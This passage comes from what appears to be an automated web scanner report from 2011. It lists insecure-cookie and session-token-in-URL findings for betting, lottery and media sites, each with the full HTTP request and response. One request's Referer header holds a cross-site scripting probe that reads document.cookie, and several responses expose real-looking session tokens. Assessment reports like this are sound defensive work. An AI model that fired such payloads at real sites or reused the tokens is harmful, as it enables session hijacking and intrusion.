Date: Mon, 16 May 2011 12:08:41 GMT
Connection: close
Set-Cookie: BIGipServerwww.betsson.com=682561964.20480.0000; path=/
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta ht
...[SNIP]...

7.12. https://www.betsson.com/en/customer-service/responsible-gaming/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.betsson.com
Path:   /en/customer-service/responsible-gaming/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/customer-service/responsible-gaming/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16796
Content-Type: text/html; Charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: lggdnstt=0; path=/
Set-Cookie: section=customer; expires=Mon, 14-May-2012 23:00:00 GMT; path=/en
Set-Cookie: language=en; expires=Tue, 15-May-2012 23:00:00 GMT; path=/
Set-Cookie: site=en; expires=Tue, 15-May-2012 23:00:00 GMT; domain=.betsson.com; path=/
Set-Cookie: ASPSESSIONIDAASDBABS=JAMLJIPDANILAPALKCAONEIB; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:40 GMT
Connection: close
Set-Cookie: BIGipServerwww.betsson.com=682561964.20480.0000; path=/
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta ht
...[SNIP]...

7.13. https://www.betsson.com/en/customer-service/terms/index.asp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.betsson.com
Path:   /en/customer-service/terms/index.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/customer-service/terms/index.asp HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68223
Content-Type: text/html; Charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: lggdnstt=0; path=/
Set-Cookie: section=customer; expires=Mon, 14-May-2012 23:00:00 GMT; path=/en
Set-Cookie: language=en; expires=Tue, 15-May-2012 23:00:00 GMT; path=/
Set-Cookie: site=en; expires=Tue, 15-May-2012 23:00:00 GMT; domain=.betsson.com; path=/
Set-Cookie: ASPSESSIONIDAASDBABS=CBMLJIPDBDPNKEECBALHKDED; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:41 GMT
Connection: close
Set-Cookie: BIGipServerwww.betsson.com=682561964.20480.0000; path=/
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta ht
...[SNIP]...

7.14. https://www.betsson.com/en/my-account/refer-a-friend/index.asp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.betsson.com
Path:   /en/my-account/refer-a-friend/index.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/my-account/refer-a-friend/index.asp HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 187
Content-Type: text/html; Charset=UTF-8
Location: /en/need-login.asp?redPage=/en/my-account/refer-a-friend/index.asp
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Tue, 15-May-2012 23:00:00 GMT; path=/
Set-Cookie: site=en; expires=Tue, 15-May-2012 23:00:00 GMT; domain=.betsson.com; path=/
Set-Cookie: ASPSESSIONIDAQQDRSDT=KLEEAKPDFACFJMDHHKDNNLBO; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:49 GMT
Connection: close
Set-Cookie: BIGipServerwww.betsson.com=699339180.20480.0000; path=/

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/en/need-login.asp?redPage=/en/my-account/refer-a-friend/index.asp">here</a>.</body>

7.15. https://www.betsson.com/my-account/refer-a-friend/index.asp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.betsson.com
Path:   /my-account/refer-a-friend/index.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /my-account/refer-a-friend/index.asp HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23633
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDAQQDRSDT=FCFEAKPDAANKFEPNPAAALGCD; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:09:12 GMT
Connection: close
Set-Cookie: BIGipServerwww.betsson.com=699339180.20480.0000; path=/
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta htt
...[SNIP]...

7.16. https://www.betsson.com/web/en/sportsbook/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.betsson.com
Path:   /web/en/sportsbook/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /web/en/sportsbook/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 78630
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: language=en; expires=Wed, 16-May-2012 12:08:59 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 12:08:59 GMT; path=/
Set-Cookie: ASP.NET_SessionId=hrdmunq10h1upatzji4snpvl; path=/; HttpOnly
Set-Cookie: lggdnstt=0; path=/
X-UA-Compatible: IE=EmulateIE8
Date: Mon, 16 May 2011 12:08:59 GMT
Connection: close
Set-Cookie: BIGipServerwww.betsson.com=682561964.20480.0000; path=/
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...

7.17. https://www.interwetten.com/en/Default.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.interwetten.com
Path:   /en/Default.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/Default.aspx HTTP/1.1
Host: www.interwetten.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerPool_Web01-Web07=1717899692.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=hb2ctrm1vmsjvqy123bfn1ln; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=hb2ctrm1vmsjvqy123bfn1ln; path=/; HttpOnly
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 11:44:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:44:27 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 33754


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<hea
...[SNIP]...

7.18. https://www.betsson.com/core/StartPlaying/Api/StartPlayingInit.ashx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.betsson.com
Path:   /core/StartPlaying/Api/StartPlayingInit.ashx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/StartPlaying/Api/StartPlayingInit.ashx HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store
Content-Type: text/javascript; charset=utf-8
Expires: Mon, 01 Jan 0001 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:35 GMT
Connection: close
Content-Length: 1480
Set-Cookie: BIGipServerwww.betsson.com=682561964.20480.0000; path=/
Vary: Accept-Encoding

/* current StartPlaying.Web version: 1.3 */
if(typeof(Betsson_StartPlaying) != "undefined")
{
Betsson_StartPlaying.Popup.workflow = {"Processes":[{"Activities":[{"Action":null,"Arg":null,"Name"
...[SNIP]...

7.19. https://www.betsson.com/core/StartPlaying/Scripts/Compiled/StartPlayingApi.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.betsson.com
Path:   /core/StartPlaying/Scripts/Compiled/StartPlayingApi.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/StartPlaying/Scripts/Compiled/StartPlayingApi.js HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 30 Mar 2011 09:14:03 GMT
Accept-Ranges: bytes
ETag: "c2a920d0baeecb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:34 GMT
Connection: close
Content-Length: 4941
Set-Cookie: BIGipServerwww.betsson.com=682561964.20480.0000; path=/
Vary: Accept-Encoding

var Betsson_StartPlaying={Popup:{workflow:{},startPlayingBaseUrl:"",GetProcessIndex:function(itemName){for(i=0;i<this.workflow.Processes.length;i++){var itm=this.workflow.Processes[i];if(itm.Name==ite
...[SNIP]...

7.20. https://www.betsson.com/start/en/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.betsson.com
Path:   /start/en/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /start/en/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: core.startpage.viewedprofile=prio=0&id=8a90f1f5-60b8-4531-a685-5a21012f097f; expires=Mon, 23-May-2011 12:08:53 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:52 GMT
Connection: close
Content-Length: 42417
Set-Cookie: BIGipServerwww.betsson.com=699339180.20480.0000; path=/
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...

7.21. https://www.betsson.com/start/is/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.betsson.com
Path:   /start/is/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /start/is/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: core.startpage.viewedprofile=prio=0&id=5c75486e-ebd0-4a87-89b5-5bff99e69097; expires=Mon, 23-May-2011 12:08:51 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:50 GMT
Connection: close
Content-Length: 39256
Set-Cookie: BIGipServerwww.betsson.com=682561964.20480.0000; path=/
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...

7.22. https://www.interwetten.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.interwetten.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: https://www.interwetten.com/en/Default.aspx
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:43:41 GMT
Connection: Keep-Alive
Set-Cookie: BIGipServerPool_Web01-Web07=1718227372.20480.0000; path=/
Vary: Accept-Encoding
Content-Length: 165

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www.interwetten.com/en/Default.aspx">here</a></body>

7.23. https://www.postcodelottery.com/PlayNOW/OrderYourTickets.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.postcodelottery.com
Path:   /PlayNOW/OrderYourTickets.htm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PlayNOW/OrderYourTickets.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.0 200 OK
Date: Mon, 16 May 2011 12:32:10 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:32:10 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="short
...[SNIP]...

7.24. https://www.thawte.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.thawte.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.thawte.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:58:53 GMT
Server: Apache
Set-Cookie: v1st=5154A4B37CB7DE69; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.thawte.com
Set-Cookie: v1st=5154A4B37CB7DE69; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.thawte.com
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 39378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...

8. Session token in URL
There are 6 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


8.1. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=115813460972&app_id=115813460972&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df74bafd74%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ff4dd62dc8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df2a4d2223%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ff4dd62dc8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13cc9e5f8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df299f0867c%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ff4dd62dc8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13cc9e5f8&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Dfd623e07c%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ff4dd62dc8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13cc9e5f8&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df34aca9878%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ff4dd62dc8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13cc9e5f8&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=1#cb=fd623e07c&origin=http%3A%2F%2Fwww.metacafe.com%2Ff4dd62dc8&relation=parent&transport=postmessage&frame=f13cc9e5f8
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.138.33
X-Cnection: close
Date: Mon, 16 May 2011 12:49:43 GMT
Content-Length: 0


8.2. http://www.heavenaffiliates.com/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.heavenaffiliates.com
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET / HTTP/1.1
Host: www.heavenaffiliates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:02:32 GMT
Server: Apache FrontPage/5.0.2.2635 mod_bwlimited/1.4 mod_auth_passthrough/2.1
X-Powered-By: PHP/5.2.15
X-Pingback: http://www.heavenaffiliates.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title> He
...[SNIP]...
<li>
               <a href="http://server.iad.liveperson.net/hc/6174495/?cmd=file&file=visitorWantsToChat&site=6174495&SESSIONVAR!survey_pre-chat_enable=off&SESSIONVAR!Chat_from_page=heavenaffiliates&SESSIONVAR!Skill=HeavenAffiliates" target="_blank"><img src="http://www.heavenaffiliates.com/wp-content/themes/ha/images/live-chat.png" alt="Live Chat" id="live" />
...[SNIP]...

8.3. http://www.metacafe.com/fplayer/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.metacafe.com
Path:   /fplayer/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /fplayer/ HTTP/1.1
Host: www.metacafe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI CUR ADM OUR NOR STA NID"
Content-Type: text/html
Date: Mon, 16 May 2011 12:25:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=b34cef86fb081c11b18f1c7533ccdcf4; path=/; domain=.metacafe.com
Set-Cookie: OAGEO=US%7CTX%7CDallas%7C75207%7C32.7825%7C-96.8207%7C623%7C214%7C%7C%7C; path=/; domain=.metacafe.com
Set-Cookie: OAID=b26d5505ed27474ffea988f3d3dd0b02; expires=Tue, 15-May-2012 12:25:14 GMT; path=/; domain=.metacafe.com
Set-Cookie: User=%7B%22sc%22%3A1%2C%22visitID%22%3A%228744ed5d828ea0d23416bbe1e22d1055%22%2C%22LEID%22%3A40%2C%22LangID%22%3A%22en%22%2C%22npUserLocations%22%3A%5B244%5D%2C%22npUserLanguages%22%3A%5B9%5D%2C%22ffilter%22%3Atrue%2C%22pve%22%3A1%2C%22fbconnected%22%3Afalse%7D; expires=Sat, 14-May-2016 12:25:14 GMT; path=/; domain=.metacafe.com
Set-Cookie: dsavip=3333427372.20480.0000; expires=Mon, 16-May-2011 13:25:14 GMT; path=/
Content-Length: 73965

           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
           <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
<li class="Account" id="Register"><a href="https://secure.metacafe.com/account/login/?token=833622e88555b42d258b55df65a98fcd&amp;action=register" rel="nofollow" title="Register">Register</a>
...[SNIP]...
<li class="Account" id="SignIn"><a href="https://secure.metacafe.com/account/login/?token=833622e88555b42d258b55df65a98fcd&amp;action=login" rel="nofollow" title="Sign In">Sign In</a>
...[SNIP]...
<li class="report" id="Submit"><a href="https://secure.metacafe.com/account/login/?token=833622e88555b42d258b55df65a98fcd&amp;action=login" title="" tabindex="7">Upload</a>
...[SNIP]...
<li><a href="https://secure.metacafe.com/account/login/?token=833622e88555b42d258b55df65a98fcd" title="Your Channel">My Channel</a>
...[SNIP]...
<li><a href="https://secure.metacafe.com/account/login/?token=833622e88555b42d258b55df65a98fcd" title="Subscriptions">Subscriptions</a>
...[SNIP]...
<li><a href="https://secure.metacafe.com/account/login/?token=833622e88555b42d258b55df65a98fcd" title="Favorites">Favorites</a>
...[SNIP]...
<li><a id="CountryFlag" href="https://secure.metacafe.com/account/login/?token=833622e88555b42d258b55df65a98fcd">Location: <img src="http://s.mcstatic.com/Images/flags/us.gif" alt="US" />
...[SNIP]...

8.4. http://www.youtube.com/user/CrazyScratchCom

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.youtube.com
Path:   /user/CrazyScratchCom

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /user/CrazyScratchCom HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:58:44 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=QJdmZX3XHX0; path=/; domain=.youtube.com; expires=Wed, 11-Jan-2012 11:58:44 GMT
Set-Cookie: GEO=dfb55d2f94c5feeb036cbf6d295ddc27cwsAAAAzVVOtwdbzTdERdA==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" xmlns:og="http://opengraphprotocol.org/schema/">
<!-- machid: sWkFSZzctYUFHdmpGMkpmS0VXa1VnRXBhekJpVlNscGE1Qk9SUzZoUG5wc3hvU3dmRHVtcUt3 -->
<head>



...[SNIP]...
<link rel="canonical" href="/user/CrazyScratchCom">
<link rel="alternate" media="handheld" href="http://m.youtube.com/profile?desktop_uri=%2Fuser%2FCrazyScratchCom&amp;sort=p&amp;channel_id=0&amp;livestreaming_tutorial=False&amp;ytsession=%7B%7D&amp;start=0&amp;user=CrazyScratchCom&amp;autoplay=True&amp;gl=US">
<meta name="title" content="">
...[SNIP]...
</style>

<link rel="alternate" media="handheld" href="http://m.youtube.com/profile?desktop_uri=%2Fuser%2FCrazyScratchCom&amp;sort=p&amp;channel_id=0&amp;livestreaming_tutorial=False&amp;ytsession=%7B%7D&amp;start=0&amp;user=CrazyScratchCom&amp;autoplay=True&amp;gl=US">

<link rel="alternate" type="application/rss+xml" title="RSS" href="http://gdata.youtube.com/feeds/base/users/CrazyScratchCom/uploads?alt=rss&amp;v=2&amp;orderby=published&amp;client=ytapi-youtube
...[SNIP]...

8.5. http://www.youtube.com/user/PostcodeLottery

Summary

Severity:   Medium
